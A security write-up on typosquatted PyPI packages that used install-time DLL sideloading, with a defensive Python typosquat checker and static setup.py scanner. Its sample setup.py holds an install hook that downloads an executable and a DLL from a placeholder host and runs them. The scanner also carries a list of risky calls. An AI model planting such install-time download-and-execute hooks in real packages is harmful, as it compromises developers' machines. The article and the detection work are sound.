Security researchers have observed an increase in malicious activity targeting open source platforms and code repositories [1] [2], including using them to host command-and-control infrastructure [1], to store stolen data [1] [2], and to distribute malware [1] [2].

Description

ReversingLabs discovered two suspicious packages on PyPI, NP6HelperHttptest and NP6HelperHttper, that used DLL sideloading to execute code discreetly [1] [2]. The names are misspellings of legitimate NP6 helper tools released by ChapsVision, a combination of typosquatting and repojacking intended to trick developers into installing the malicious versions in place of the real ones [1] [2] [3]. When notified, ChapsVision confirmed that one of its employees had published the helper tools, and the packages were removed from PyPI [1]; by then the malicious packages had already been downloaded multiple times [3].

The malicious code is hidden in each package's setup.py, so it runs at install time rather than when the library is imported [1] [3]. The script downloads a legitimate executable that is susceptible to DLL sideloading together with a malicious DLL, so that launching the trusted binary loads the attacker's code, a technique that evades detection by security software [1] [3]. DLL sideloading has previously been used by the Lazarus Group, a North Korea-linked threat actor, to download and execute payloads [1] [2]. ReversingLabs' research suggests a broader campaign involving multiple packages and further executables susceptible to DLL sideloading [1] [2] [3], highlighting the evolving threat landscape [1].
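Two checks a reviewer can apply to a candidate dependency before installing it follow from the description above: a name-distance check that catches typosquats such as NP6HelperHttptest and NP6HelperHttper, and a static scan of setup.py for install-time download-and-execute behaviour. This is an added example, not code from ReversingLabs, ChapsVision, or the sources cited. The page names only the impostor packages, so NP6HelperHttp is assumed here as the legitimate name they imitate; the sample setup.py, its URLs and file names are constructed placeholders shaped like the behaviour described, not the campaign's real artifacts.

```python
"""Typosquat distance check and static setup.py scan for install-time payloads.
Added example; not code from ReversingLabs, ChapsVision, or the cited sources."""
import ast
import re

# Assumed: the page names only the impostor packages. NP6HelperHttp stands in for
# the legitimate name they imitate; use the real allow-list in practice.
KNOWN_GOOD = ["NP6HelperHttp"]


def normalize(name: str) -> str:
    """PEP 503 name normalization, as pip and the PyPI simple index apply it."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a: str, b: str) -> int:
    """Edit distance; a small value against a known name is the typosquat signal."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def typosquat_candidates(name, known_good=KNOWN_GOOD, max_distance=4):
    """(legitimate_name, distance) pairs that `name` is suspiciously close to.
    An exact normalized match is the legitimate package itself and yields []."""
    n = normalize(name)
    hits = []
    for good in known_good:
        g = normalize(good)
        if n == g:
            return []
        d = levenshtein(n, g)
        # a short edit, or the real name with a suffix appended ("...test"), both count
        if d <= max_distance or n.startswith(g):
            hits.append((good, d))
    return sorted(hits, key=lambda h: h[1])


# Calls with no business in a setup.py: network fetches and process/DLL launches.
RISKY_CALLS = {
    "urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get",
    "subprocess.Popen", "subprocess.run", "subprocess.call", "os.system",
    "os.startfile", "ctypes.WinDLL", "ctypes.CDLL", "exec", "eval",
}
SETUPTOOLS_COMMANDS = {"install", "develop", "build_py"}


def _dotted(node):
    """Rebuild 'a.b.c' from an Attribute/Name chain; None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source: str):
    """Static scan of a setup.py; returns (kind, line, detail). Nothing is executed."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in RISKY_CALLS:
                findings.append(("call", node.lineno, name))
            # a custom cmdclass is how setup.py hooks code onto `pip install`
            if name == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.append(("cmdclass", node.lineno, "setup(cmdclass=...)"))
        elif isinstance(node, ast.ClassDef):
            if {_dotted(b) for b in node.bases} & SETUPTOOLS_COMMANDS:
                findings.append(("command_override", node.lineno, node.name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            v = node.value
            if v.startswith(("http://", "https://")) or v.lower().endswith((".exe", ".dll")):
                findings.append(("literal", node.lineno, v))
    return findings


# Constructed sample setup.py shaped like the behaviour the page describes;
# the URL, host binary and DLL names are placeholders, not real artifacts.
SAMPLE_SETUP_PY = """\
from setuptools import setup
from setuptools.command.install import install
import subprocess
import urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        # fetch a signed executable prone to sideloading plus a DLL it will load
        urllib.request.urlretrieve("http://example.invalid/host.exe", "host.exe")
        urllib.request.urlretrieve("http://example.invalid/helper.dll", "helper.dll")
        subprocess.Popen(["host.exe"])  # picks up helper.dll from its own directory

setup(name="np6helperhttptest", version="0.1", cmdclass={"install": PostInstall})
"""

if __name__ == "__main__":
    for pkg in ("NP6HelperHttptest", "NP6HelperHttper", "NP6HelperHttp"):
        print(pkg, "->", typosquat_candidates(pkg))
    for kind, line, detail in scan_setup_py(SAMPLE_SETUP_PY):
        print(f"{kind:17} line {line}: {detail}")
```

The scan is deliberately static: running a suspect setup.py, even in a sandbox, is exactly the install-time execution the campaign relies on, so the example parses the file with `ast` and never imports or executes it. The name check should be run against the normalized form, since pip treats `NP6-Helper_Http` and `np6helperhttp` as different names only before normalization.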

Conclusion

The discovery of malicious packages on open source platforms and code repositories underscores the need for vigilance and security measures in the software supply chain. Mitigating the risk posed by packages such as NP6HelperHttptest and NP6HelperHttper requires awareness of typosquatting, careful vetting of dependencies before installation (including what their setup.py does at install time), and prompt removal once they are detected. The evolving tactics and techniques employed by threat actors, such as DLL sideloading [1] [2], necessitate ongoing research and collaboration within the cybersecurity community to stay ahead of emerging threats.

References

[1] https://www.infosecurity-magazine.com/news/typosquatting-repojacking-tactics/
[2] https://ciso2ciso.com/new-typosquatting-and-repojacking-tactics-uncovered-on-pypi-source-www-infosecurity-magazine-com/
[3] https://paxtowillson.wordpress.com/2024/02/21/new-malicious-pypi-kit-captured-using-hidden-sideloading-strategy/